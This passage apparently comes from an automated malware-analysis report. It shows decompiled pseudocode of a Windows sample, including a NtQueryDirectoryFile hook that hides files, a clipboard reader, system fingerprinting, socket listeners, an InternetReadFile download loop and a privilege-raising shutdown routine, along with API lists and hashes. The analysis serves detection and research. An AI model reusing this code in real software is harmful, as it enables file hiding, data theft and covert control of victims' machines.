					__eflags = _a4 & 0x00000002;
					if((_a4 & 0x00000002) != 0) {
						_push( &_v12);
						_t145 = 4;
						_v12 = 0x1020716;
						_t126 = E0041233D(_t147, 0x2713, _t133, _t145);
					}
					L11:
					__eflags = _a4 & 0x00000004;
					if((_a4 & 0x00000004) == 0) {
						L16:
						__eflags = _t126;
						if(_t126 == 0) {
							L29:
							__eflags = _v13 - 1;
							if(_v13 == 1) {
								E0040F15E( *_t147);
								 *_t147 =  *_t147 & 0x00000000;
								__eflags =  *_t147;
							}
							L31:
							return _t126;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) == 0) {
							L20:
							__eflags = _t126;
							if(_t126 == 0) {
								goto L29;
							}
							__eflags = _a4 & 0x00000010;
							if((_a4 & 0x00000010) == 0) {
								L28:
								__eflags = _t126;
								if(_t126 != 0) {
									goto L31;
								}
								goto L29;
							}
							_t73 = GetModuleFileNameW(0,  &_v600, 0x103);
							_v12 = _t73;
							__eflags = _t73;
							if(_t73 > 0) {
								__eflags = 0;
								 *((short*)(_t148 + _t73 * 2 - 0x254)) = 0;
								_t126 = E004123A9(0, 0, _t147, 0x271e,  &_v600);
							}
							_v12 = 0x103;
							__eflags = _t126;
							if(_t126 == 0) {
								goto L29;
							} else {
								_t76 =  *0x414b50(2,  &_v600,  &_v12);
								__eflags = _t76;
								if(_t76 != 0) {
									_t77 = _v12;
									__eflags = _t77;
									if(_t77 > 0) {
										__eflags = 0;
										 *((short*)(_t148 + _t77 * 2 - 0x254)) = 0;
										_t126 = E004123A9(0, 0, _t147, 0x2721,  &_v600);
									}
								}
								goto L28;
							}
						}
						_v368.dwOSVersionInfoSize = 0x11c;
						GetVersionExW( &_v368);
						_v36 = _v368.dwMajorVersion;
						_v32 = _v368.dwMinorVersion;
						_v28 = _v368.dwBuildNumber;
						_t137 = _v88 & 0x0000ffff;
						_v24 = (_v90 & 0x0000ffff) << 0x00000010 | _v92 & 0x0000ffff;
						_v20 = (_v86 & 0x000000ff) << 0x00000010 | _v88 & 0x0000ffff;
						_push( &_v36);
						_t142 = 0x14;
						_t126 = E0041233D(_t147, 0x271c, _v88 & 0x0000ffff, _t142);
						__eflags = _t126;
						if(_t126 == 0) {
							goto L29;
						}
						_v12 =  *0x414d98() & 0x0000ffff;
						_push( &_v12);
						_t143 = 2;
						_t126 = E0041233D(_t147, 0x271d, _t137, _t143);
						goto L20;
					}
					__eflags = _t126;
					if(_t126 == 0) {
						goto L29;
					}
					_v12 = E0040F233();
					_push( &_v12);
					_t144 = 4;
					_t126 = E0041233D(_t147, 0x2719, _t133, _t144);
					__eflags = _t126;
					if(_t126 == 0) {
						goto L29;
					}
					_v12 = E0040F272();
					_t126 = E0041233D(_t147, 0x271b, _t133, _t144,  &_v12);
					__eflags = _t126;
					if(_t126 == 0) {
						goto L29;
					}
					_v12 = GetTickCount();
					_t126 = E0041233D(_t147, 0x271a, _t133, _t144,  &_v12);
					goto L16;
				}
				_t138 =  *0x414d10; // 0x6c646e61
				_t146 =  &_v288;
				E0040F5CC(_t138,  &_v288);
				_t117 =  *0x414b7c; // 0x418000
				_t7 = _t117 + 8; // 0x30
				_v80 =  *_t7 & 0x000000ff;
				_t9 = _t117 + 9; // 0x60000000
				_v78 =  *_t9 & 0x000000ff;
				_t11 = _t117 + 0xa; // 0xea600000
				_t133 =  *_t11 & 0x000000ff;
				_v76 =  *_t11 & 0x000000ff;
				_t13 = _t117 + 0xb; // 0xea6000
				_v74 =  *_t13 & 0x000000ff;
				_v72 = 0;
				_t126 = E004123A9( *_t11 & 0x000000ff, __eflags, _t147, 0x2711, _t146);
				__eflags = _t126;
				if(_t126 == 0) {
					goto L11;
				}
				__eflags = _v80;
				if(__eflags != 0) {
					_t126 = E004123A9(_t133, __eflags, _t147, 0x2712,  &_v80);
				}
				__eflags = _t126;
				if(_t126 == 0) {
					goto L11;
				} else {
					goto L9;
				}
			}





































        0x00412cce
        0x00412cdc
        0x00412cde
        0x00412ce2
        0x00412ce4
        0x00412ce9
        0x00412ced
        0x00000000
        0x00412cef
        0x00412cf6
        0x00412cf6
        0x00412cfa
        0x00412cfe
        0x00412d70
        0x00412d70
        0x00412d74
        0x00412d79
        0x00412d7c
        0x00412d84
        0x00412d90
        0x00412d90
        0x00412d92
        0x00412d92
        0x00412d96
        0x00412e02
        0x00412e02
        0x00412e04
        0x00412f33
        0x00412f33
        0x00412f37
        0x00412f3b
        0x00412f40
        0x00412f40
        0x00412f40
        0x00412f43
        0x00000000
        0x00412f43
        0x00412e0a
        0x00412e0e
        0x00412ea4
        0x00412ea4
        0x00412ea6
        0x00000000
        0x00000000
        0x00412eac
        0x00412eb0
        0x00412f2f
        0x00412f2f
        0x00412f31
        0x00000000
        0x00000000
        0x00000000
        0x00412f31
        0x00412ec1
        0x00412ec7
        0x00412eca
        0x00412ecc
        0x00412ece
        0x00412ed0
        0x00412eea
        0x00412eea
        0x00412eec
        0x00412eef
        0x00412ef1
        0x00000000
        0x00412ef3
        0x00412f00
        0x00412f06
        0x00412f08
        0x00412f0a
        0x00412f0d
        0x00412f0f
        0x00412f11
        0x00412f13
        0x00412f2d
        0x00412f2d
        0x00412f0f
        0x00000000
        0x00412f08
        0x00412ef1
        0x00412e1b
        0x00412e25
        0x00412e35
        0x00412e3e
        0x00412e47
        0x00412e53
        0x00412e57
        0x00412e63
        0x00412e69
        0x00412e6c
        0x00412e79
        0x00412e7b
        0x00412e7d
        0x00000000
        0x00000000
        0x00412e8c
        0x00412e92
        0x00412e95
        0x00412ea2
        0x00000000
        0x00412ea2
        0x00412d98
        0x00412d9a
        0x00000000
        0x00000000
        0x00412da5
        0x00412dab
        0x00412dae
        0x00412dbb
        0x00412dbd
        0x00412dbf
        0x00000000
        0x00000000
        0x00412dca
        0x00412ddd
        0x00412ddf
        0x00412de1
        0x00000000
        0x00000000
        0x00412ded
        0x00412e00
        0x00000000
        0x00412e00
        0x00412d00
        0x00412d06
        0x00412d0c
        0x00412d11
        0x00412d16
        0x00412d1b
        0x00412d1f
        0x00412d24
        0x00412d28
        0x00412d28
        0x00412d2d
        0x00412d31
        0x00412d36
        0x00412d3c
        0x00412d4e
        0x00412d50
        0x00412d52
        0x00000000
        0x00000000
        0x00412d54
        0x00412d59
        0x00412d6a
        0x00412d6a
        0x00412d6c
        0x00412d6e
        0x00000000
        0x00000000
        0x00000000
        0x00000000

        APIs
        • GetTickCount.KERNEL32 ref: 00412DE7
        • GetVersionExW.KERNEL32(?,00000000,00000000), ref: 00412E25
          • Part of subcall function 00412322: RtlAllocateHeap.NTDLL(00000008,00000020,00412CE9), ref: 0041232C
        • GetUserDefaultUILanguage.KERNEL32(?), ref: 00412E83
        • GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,00000000), ref: 00412EC1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AllocateCountDefaultFileHeapLanguageModuleNameTickUserVersion
        • String ID: andle
        • API String ID: 1370906912-46660432
        • Opcode ID: 784d41bb76efd19ac85aae6fa58174823098579b1f5df9c2cbc5f21122c8e007
        • Instruction ID: 975b72f89d3779e9a10d89c50f516e1201c85f278f138894c489d004d9e2df97
        • Opcode Fuzzy Hash: 784d41bb76efd19ac85aae6fa58174823098579b1f5df9c2cbc5f21122c8e007
        • Instruction Fuzzy Hash: 9561D970A4025C6ADB11DBA8D9447EEBBF4EF45304F04406BE984DB381D7BC8ADACB58
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00406266, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130nativefilestringCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00406266(signed int _a4, void* _a8, _Unknown_base(*)()* _a12, void* _a16, struct _ERESOURCE_LITE _a20, void* _a24, long _a28, union _FILE_INFORMATION_CLASS _a32, long _a36, struct _EXCEPTION_RECORD _a40, char _a44) {
				char _v524;
				WCHAR* _v1544;
				void _v1548;
				void* __edi;
				void* __esi;
				long _t45;
				signed int _t51;
				void* _t53;
				signed int _t59;
				signed int _t60;
				void* _t61;
				void* _t62;
				union _FILE_INFORMATION_CLASS _t68;
				void* _t69;
				intOrPtr _t71;
				char* _t74;
				signed int* _t76;
				void* _t78;
				WCHAR* _t79;
				signed int* _t80;

				_t68 = _a32;
				_t45 = NtQueryDirectoryFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _t68, _a36, _a40, _a44);
				_a40 = _t45;
				if(_t45 != 0 || _a24 == _t45 || _t68 != 1 && _t68 != 2 && _t68 != 3 && _t68 != 0xc) {
					L31:
					return _a40;
				} else {
					_a36 = _a36 & 0x00000000;
					if(NtQueryObject(_a4, 1,  &_v1548, 0x400,  &_a36) != 0) {
						goto L31;
					}
					_t79 =  *0x414780; // 0xf60057
					_v1544[_v1548 & 0x0000ffff] = 0;
					_t89 = _t79;
					if(_t79 != 0) {
						L11:
						_t51 = lstrcmpiW(_t79, _v1544);
						if(_t51 != 0) {
							goto L31;
						}
						_a44 = _a44 & _t51;
						_a4 = _a4 & _t51;
						_t53 = _t68 - 1;
						if(_t53 == 0) {
							_a44 = 0x40;
							L20:
							_a4 = 0x3c;
							L21:
							_t69 = 0;
							_t80 = 0;
							do {
								_t76 = _t80;
								_t80 = _t69 + _a24;
								if(E00405D47(_t80 + _a44,  *((intOrPtr*)(_t80 + _a4))) == 0) {
									goto L26;
								}
								_t60 =  *_t80;
								if(_t60 == 0) {
									__eflags = _t76;
									if(_t76 == 0) {
										_a40 = 0xc000000f;
									} else {
										 *_t76 =  *_t76 & 0x00000000;
									}
									goto L31;
								}
								if(_t76 != 0) {
									 *_t76 =  *_t76 + _t60;
								}
								L26:
								_t59 =  *_t80;
								_t69 = _t69 + _t59;
							} while (_t59 > 0);
							goto L31;
						}
						_t61 = _t53 - 1;
						if(_t61 == 0) {
							_a44 = 0x44;
							goto L20;
						}
						_t62 = _t61 - 1;
						if(_t62 == 0) {
							_a44 = 0x5e;
							goto L20;
						} else {
							if(_t62 == 9) {
								_a44 = 0xc;
								_a4 = 8;
							}
							goto L21;
						}
					} else {
						E0040AE64( &_v524, _t89);
						_t79 = E0040F2C5( &_v524);
						 *0x414780 = _t79;
						_t74 = 0x4141f5;
						_t78 = 2;
						do {
							_t24 = _t74 - 1; // 0x30000
							_t71 =  *0x414ad4; // 0x241f5a8
							 *_t74 = E0040F649( *((intOrPtr*)(_t71 + ( *_t24 & 0x000000ff) * 4)));
							_t74 = _t74 + 2;
							_t78 = _t78 - 1;
						} while (_t78 != 0);
						if(_t79 == 0) {
							goto L31;
						}
						goto L11;
					}
				}
			}























        0x00406270
        0x00406294
        0x0040629a
        0x0040629f
        0x004063ef
        0x004063f6
        0x004062c6
        0x004062c6
        0x004062e7
        0x00000000
        0x00000000
        0x004062f4
        0x00406302
        0x00406306
        0x00406308
        0x0040634d
        0x00406354
        0x0040635c
        0x00000000
        0x00000000
        0x00406362
        0x00406365
        0x0040636a
        0x0040636b
        0x0040639a
        0x004063a1
        0x004063a1
        0x004063a8
        0x004063a8
        0x004063aa
        0x004063ac
        0x004063af
        0x004063b1
        0x004063c7
        0x00000000
        0x00000000
        0x004063c9
        0x004063cd
        0x004063df
        0x004063e1
        0x004063e8
        0x004063e3
        0x004063e3
        0x004063e3
        0x00000000
        0x004063e1
        0x004063d1
        0x004063d3
        0x004063d3
        0x004063d5
        0x004063d5
        0x004063d7
        0x004063d9
        0x00000000
        0x004063dd
        0x0040636d
        0x0040636e
        0x00406391
        0x00000000
        0x00406391
        0x00406370
        0x00406371
        0x00406388
        0x00000000
        0x00406373
        0x00406376
        0x00406378
        0x0040637f
        0x0040637f
        0x00000000
        0x00406376
        0x0040630a
        0x00406310
        0x0040631c
        0x00406320
        0x00406326
        0x0040632b
        0x0040632c
        0x0040632c
        0x00406330
        0x0040633e
        0x00406341
        0x00406342
        0x00406342
        0x00406347
        0x00000000
        0x00000000
        0x00000000
        0x00406347
        0x00406308

        APIs
        • NtQueryDirectoryFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00406294
        • NtQueryObject.NTDLL(?,00000001,?,00000400,00000000), ref: 004062DF
        • lstrcmpiW.KERNEL32(00F60057,?), ref: 00406354
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Query$DirectoryFileObjectlstrcmpi
        • String ID: <$@
        • API String ID: 2113822959-1426351568
        • Opcode ID: 1944ff6dfb329d042403614678f08897eb4d9b11376bd25ed0181ea8a650f634
        • Instruction ID: 7de8b15f00870881e6b7ef0282915685d7ee43d5db203d9f3cf7cc35b81cdaa6
        • Opcode Fuzzy Hash: 1944ff6dfb329d042403614678f08897eb4d9b11376bd25ed0181ea8a650f634
        • Instruction Fuzzy Hash: ED41AD721102099BCF218F59C884AEA7BA5FF88354F06413BFD06A62D0D779DCA5DB98
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040AE64, Relevance: 6.0, APIs: 4, Instructions: 45filestringnativeCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040AE64(WCHAR* __esi, void* __eflags) {
				long _v8;
				WCHAR* _v1028;
				void _v1032;
				void* _t22;

				E0040AE3C(__esi);
				_t22 = CreateFileW(__esi, 0x80000000, 3, 0, 3, 0x2000000, 0);
				 *__esi = 0;
				if(_t22 != 0xffffffff) {
					_v8 = _v8 & 0;
					if(NtQueryObject(_t22, 1,  &_v1032, 0x400,  &_v8) == 0 && _v1032 < 0x104) {
						_v1028[_v1032 & 0x0000ffff] = 0;
						lstrcpyW(__esi, _v1028);
					}
					return CloseHandle(_t22);
				}
				return 0;
			}







        0x0040ae70
        0x0040ae8e
        0x0040ae92
        0x0040ae98
        0x0040ae9a
        0x0040aeb8
        0x0040aed7
        0x0040aee2
        0x0040aee2
        0x00000000
        0x0040aee9
        0x0040aef1

        APIs
          • Part of subcall function 0040AE3C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,004069ED,?,?), ref: 0040AE5D
        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,02000000,00000000,?), ref: 0040AE88
        • NtQueryObject.NTDLL(00000000,00000001,?,00000400,?), ref: 0040AEB0
        • lstrcpyW.KERNEL32(?,?), ref: 0040AEE2
        • CloseHandle.KERNEL32(00000000), ref: 0040AEE9
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseCreateFileFolderHandleObjectPathQuerySpeciallstrcpy
        • String ID:
        • API String ID: 2309192175-0
        • Opcode ID: 20ce9198a7f0c93447197e7a91faac10e0b57601d9b25a34d7b40757999068b7
        • Instruction ID: b7f087c276d9d341e8cfee504d6859a87dc98d40a8ebf656d1b30a92691f448b
        • Opcode Fuzzy Hash: 20ce9198a7f0c93447197e7a91faac10e0b57601d9b25a34d7b40757999068b7
        • Instruction Fuzzy Hash: DE01A2B5640314A7EB209B64EC45BEE72BCEF48704F1040A6B706F61D1E6749A42879D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004106C8, Relevance: 6.0, APIs: 4, Instructions: 26networkCOMMON
        Download Yara Rule
        APIs
        • socket.WS2_32(?,00000001,00000006), ref: 004106D1
        • bind.WS2_32(00000000,?,?), ref: 004106E4
        • listen.WS2_32(00000000,?), ref: 004106F3
        • closesocket.WS2_32(00000000), ref: 004106FE
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: bindclosesocketlistensocket
        • String ID:
        • API String ID: 952684215-0
        • Opcode ID: f7d94fb3d4fe02aacc3e8ac7926b2463f9a3db617c54fb7ef3445826f1114da5
        • Instruction ID: d070a8ef47206c14f8795a1e8b12b31bd7964bc1c69a8395d5a4a8da797fe4f0
        • Opcode Fuzzy Hash: f7d94fb3d4fe02aacc3e8ac7926b2463f9a3db617c54fb7ef3445826f1114da5
        • Instruction Fuzzy Hash: 32E09B3150212166C6202B759C4CEDBBA55BF81771F018321F9B1D22E0EB6488D1C6DC
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040652B, Relevance: 4.6, APIs: 3, Instructions: 77clipboardCOMMON
        Download Yara Rule
        C-Code - Quality: 96%
        			E0040652B(void* __ebp, signed int _a4) {
				intOrPtr _v0;
				void* _v4;
				void* _v8;
				void* __ecx;
				void* __edi;
				void* _t9;
				intOrPtr _t12;
				void* _t23;
				void* _t25;
				void* _t28;
				int _t39;
				void* _t42;
				void* _t43;

				_t42 = __ebp;
				_t39 = _a4;
				_t9 = GetClipboardData(_t39);
				_t28 = _t9;
				_v4 = _t28;
				if(_t28 != 0 && (_t39 == 1 || _t39 == 0xd || _t39 == 7)) {
					GlobalFix(_t28);
					_t23 = _t9;
					if(_t23 != 0) {
						_a4 = _a4 & 0x00000000;
						if(_t39 == 0xd) {
							_push(_t42);
							_t26 = _t23;
							_t43 = E0040F649(_t23);
							_t12 = E0040F583(_t11, _t23);
							_v0 = _t12;
							if(_t12 != 0) {
								_t40 = " ";
								E0040642E(_t26, 1, " ");
								if(_t43 != 0) {
									E0040642E(_t26, _t43, _a4);
								}
								E0040642E(_t26, 1, _t40);
							}
						} else {
							_t41 = " ";
							E0040642E(_t25, 1, " ");
							_t27 = _t23;
							if(E0040F637(_t23) != 0) {
								E0040642E(_t27, _t19, _t23);
							}
							E0040642E(_t27, 1, _t41);
						}
						E0040F15E(_a4);
						_t28 = _v8;
						GlobalUnWire(_t28);
					}
				}
				return _t28;
			}
















        0x0040652b
        0x0040652d
        0x00406533
        0x00406539
        0x0040653b
        0x00406541
        0x0040655c
        0x00406562
        0x00406566
        0x0040656c
        0x00406574
        0x004065a2
        0x004065a3
        0x004065ab
        0x004065ad
        0x004065b2
        0x004065b8
        0x004065ba
        0x004065c3
        0x004065ca
        0x004065d2
        0x004065d2
        0x004065db
        0x004065db
        0x00406576
        0x00406576
        0x0040657f
        0x00406584
        0x0040658d
        0x00406592
        0x00406592
        0x0040659b
        0x0040659b
        0x004065e5
        0x004065ea
        0x004065ef
        0x004065ef
        0x004065f5
        0x004065fb

        APIs
        • GetClipboardData.USER32(?), ref: 00406533
        • GlobalFix.KERNEL32(00000000), ref: 0040655C
        • GlobalUnWire.KERNEL32(?), ref: 004065EF
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Global$ClipboardDataWire
        • String ID:
        • API String ID: 2697403597-0
        • Opcode ID: c2c17a544fe198e3da8c0a678302f7f255488ae7b248c3bb062ac7569988dec5
        • Instruction ID: 3d4401b48050bf601ecf09fe8be14ff2f9f129239b046d4be2e0f68863b01aa2
        • Opcode Fuzzy Hash: c2c17a544fe198e3da8c0a678302f7f255488ae7b248c3bb062ac7569988dec5
        • Instruction Fuzzy Hash: C911B47690421267C6253B266C4897F6A999BC5314B17043FF94BB36D5CE3CCC2681AE
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040F233, Relevance: 4.5, APIs: 3, Instructions: 22timeCOMMON
        Download Yara Rule
        C-Code - Quality: 68%
        			E0040F233() {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;

				GetSystemTime( &_v28);
				SystemTimeToFileTime( &_v28,  &_v12);
				asm("adc ecx, 0xfe624e21");
				return E004116C4(_v12.dwLowDateTime + 0x2ac18000, _v12.dwHighDateTime, 0x989680, 0);
			}





        0x0040f23d
        0x0040f24b
        0x0040f263
        0x0040f271

        APIs
        • GetSystemTime.KERNEL32(?,?,?,?,00412DA5,00000000,00000000), ref: 0040F23D
        • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,00412DA5,00000000,00000000), ref: 0040F24B
        • __aulldiv.LIBCMT ref: 0040F26B
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Time$System$File__aulldiv
        • String ID:
        • API String ID: 1459046340-0
        • Opcode ID: 4079fd7a9e235c70150cff8bc555946218972f43bf08e4fd0f7655045d2ffe83
        • Instruction ID: 7feaf26f5f91c6dea9a257d8bb6c62f8876f05dd757cb0aa631b2e1babccb2bf
        • Opcode Fuzzy Hash: 4079fd7a9e235c70150cff8bc555946218972f43bf08e4fd0f7655045d2ffe83
        • Instruction Fuzzy Hash: DEE0B87990020D67CF00EBE4DD4AEDE777CEB4430DF040455B601E3151E674E6458754
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00410986, Relevance: 4.5, APIs: 3, Instructions: 21networkCOMMON
        Download Yara Rule
        APIs
        • socket.WS2_32(00000000,00000002,00000011), ref: 0041098F
        • bind.WS2_32(00000000,?,?), ref: 004109A2
        • closesocket.WS2_32(00000000), ref: 004109AD
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: bindclosesocketsocket
        • String ID:
        • API String ID: 1873677229-0
        • Opcode ID: b82aa2d89544f60e7f13e4b373ee805cca4f8564c667f576303abb369ac61820
        • Instruction ID: 800f2efb5104115cf60c2ba11a59b116037af1c0b9d68e45f4c06f8fcb3aab59
        • Opcode Fuzzy Hash: b82aa2d89544f60e7f13e4b373ee805cca4f8564c667f576303abb369ac61820
        • Instruction Fuzzy Hash: D8E0867150212066D2201B695C0DDDB6A549B457B1F024321FD60922E1E76848C186EC
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040B938, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13shutdownCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040B938() {
				intOrPtr _v0;

				E00411622(L"SeShutdownPrivilege");
				return ExitWindowsEx((0 | _v0 != 0x00000000) + 0x00000001 | 0x00000004, 0) & 0xffffff00 | _t11 != 0x00000000;
			}




        0x0040b93d
        0x0040b95d

        APIs
          • Part of subcall function 00411622: OpenProcessToken.ADVAPI32(FFFFFFFF,00000028,?,?,0040ADE9,SeDebugPrivilege), ref: 00411637
          • Part of subcall function 00411622: LookupPrivilegeValueW.ADVAPI32(00000000), ref: 00411657
          • Part of subcall function 00411622: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 0041166D
          • Part of subcall function 00411622: GetLastError.KERNEL32 ref: 00411677
          • Part of subcall function 00411622: FindCloseChangeNotification.KERNELBASE(?), ref: 00411686
        • ExitWindowsEx.USER32(00000001,00000000), ref: 0040B952
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Token$AdjustChangeCloseErrorExitFindLastLookupNotificationOpenPrivilegePrivilegesProcessValueWindows
        • String ID: SeShutdownPrivilege
        • API String ID: 1103692467-3733053543
        • Opcode ID: 7eac313e53d096201356e4c881d4be3addb3bf13563b54df970efdb37ae7d46e
        • Instruction ID: 2850f48743e552c901a41c77a83842efa37ed9fe977d32590c55ef76a6a49b17
        • Opcode Fuzzy Hash: 7eac313e53d096201356e4c881d4be3addb3bf13563b54df970efdb37ae7d46e
        • Instruction Fuzzy Hash: D2C0805164530066F20077B20D06B5F35984F50B94F0DC87EB141D1491C57CC650513C
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00412BFD, Relevance: 3.0, APIs: 2, Instructions: 24COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00412BFD() {
				void* _t1;

				E0040F21C(_t1, 0x4155b4, 0, 0x24);
				if(InitializeSecurityDescriptor(0x4155c0, 1) != 0 && SetSecurityDescriptorDacl(0x4155c0, 1, 0, 0) != 0) {
					 *0x4155bc =  *0x4155bc & 0x00000000;
					 *0x4155b4 = 0xc;
					 *0x4155b8 = 0x4155c0;
				}
				return 1;
			}




        0x00412c07
        0x00412c1c
        0x00412c2f
        0x00412c36
        0x00412c40
        0x00412c40
        0x00412c49

        APIs
        • InitializeSecurityDescriptor.ADVAPI32(004155C0,00000001,004155B4,00000000,00000024,00000000,0040ACAD), ref: 00412C14
        • SetSecurityDescriptorDacl.ADVAPI32(004155C0,00000001,00000000,00000000), ref: 00412C25
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: DescriptorSecurity$DaclInitialize
        • String ID:
        • API String ID: 625223987-0
        • Opcode ID: 72a57eab827d0b6639170df0336378e0f2baab9f540573fedf0b2d1dae722da2
        • Instruction ID: 810c3b2a7dacfa6547dfdbfe7b5dc493ae66a857247e7214a7acc5f0501eb031
        • Opcode Fuzzy Hash: 72a57eab827d0b6639170df0336378e0f2baab9f540573fedf0b2d1dae722da2
        • Instruction Fuzzy Hash: B8E04870785B10FAE2301B11AD4DBCB39576781B05F104039F200AD1D8D7E954814A9C
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405C1F, Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 37%
        			E00405C1F(intOrPtr _a4, short* _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _t10;
				intOrPtr _t13;
				void* _t15;
				intOrPtr _t16;
				short* _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t16 = _a4;
				_t18 = _t16 -  *0x414b68; // 0x73560000
				if(_t18 == 0) {
					L2:
					if(_t17 == 0) {
						L4:
						_t13 = 0;
						L5:
						if(_t17 == 0) {
							L8:
							_t9 = 0;
							L9:
							_t10 = E00407B46(_t13, _t15, _t16, _t9, _a12, _t13);
							if(_t10 == 0) {
								return  *0x414c0c(_t16, _t17, _a12, _a16);
							}
							 *_a16 = _t10;
							return 0;
						}
						_t9 =  *((intOrPtr*)(_t17 + 4));
						if( *((intOrPtr*)(_t17 + 4)) == 0 ||  *_t17 <= 0) {
							goto L8;
						} else {
							goto L9;
						}
					}
					_t13 =  *((intOrPtr*)(_t17 + 4));
					goto L5;
				}
				_t19 = _t16 -  *0x414ca8; // 0x75300000
				if(_t19 != 0) {
					goto L4;
				}
				goto L2;
			}










        0x00405c23
        0x00405c27
        0x00405c2a
        0x00405c30
        0x00405c3a
        0x00405c3c
        0x00405c43
        0x00405c43
        0x00405c45
        0x00405c47
        0x00405c56
        0x00405c56
        0x00405c58
        0x00405c5e
        0x00405c65
        0x00000000
        0x00405c78
        0x00405c6a
        0x00000000
        0x00405c6c
        0x00405c49
        0x00405c4e
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00405c4e
        0x00405c3e
        0x00000000
        0x00405c3e
        0x00405c32
        0x00405c38
        0x00000000
        0x00000000
        0x00000000

        APIs
        • LdrGetProcedureAddress.NTDLL(?,?,?,?), ref: 00405C78
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressProcedure
        • String ID:
        • API String ID: 3653107232-0
        • Opcode ID: c98d815fd6741e72ebeab39791a94d1842b3540ea8d65b8ba09837a5dc4a3b7d
        • Instruction ID: a4df5363a4cfde1567e341ddf548240104d0a92343ee604254e2b1ef622cbcc6
        • Opcode Fuzzy Hash: c98d815fd6741e72ebeab39791a94d1842b3540ea8d65b8ba09837a5dc4a3b7d
        • Instruction Fuzzy Hash: 4701D132209B19ABEB249F54CC00CBB73A9EB81B50705443AEC05B3280D738FC908FA9
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00407066, Relevance: 1.5, APIs: 1, Instructions: 30filenetworkCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00407066(void* __ecx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				void* _t9;
				void* _t18;

				_t18 = 0;
				if(_a12 <= 0) {
					L4:
					_t9 = _t18;
				} else {
					while(InternetReadFile(_a4, _a8 + _t18, _a12 - _t18,  &_v8) != 0) {
						if(_v8 == 0) {
							goto L4;
						} else {
							_t18 = _t18 + _v8;
							if(_t18 < _a12) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L5;
					}
					_t9 = 0;
				}
				L5:
				return _t9;
			}






        0x0040706b
        0x00407070
        0x0040709d
        0x0040709d
        0x00407072
        0x00407072
        0x00407093
        0x00000000
        0x00407095
        0x00407095
        0x0040709b
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0040709b
        0x00000000
        0x00407093
        0x004070a4
        0x004070a4
        0x0040709f
        0x004070a1

        APIs
        • InternetReadFile.WININET(?,?,?,?), ref: 00407085
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: FileInternetRead
        • String ID:
        • API String ID: 778332206-0
        • Opcode ID: 4c27b2217d11043de3481ba3151263d24bd1767be6b9fe08a2f398d3a517715e
        • Instruction ID: 8ecd0bfb204803e725bf59e70b43c2576defa7fa31a4285be4d75c4d576e0f77
        • Opcode Fuzzy Hash: 4c27b2217d11043de3481ba3151263d24bd1767be6b9fe08a2f398d3a517715e
        • Instruction Fuzzy Hash: DEF01C72A04129EBCB10DF68CC04A9F77A8FB00780F014166B914E3281D374FE50D7A9
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040F272, Relevance: 1.5, APIs: 1, Instructions: 21timeCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040F272() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t12;
				void* _t14;

				_t12 = _t14 - 0x78;
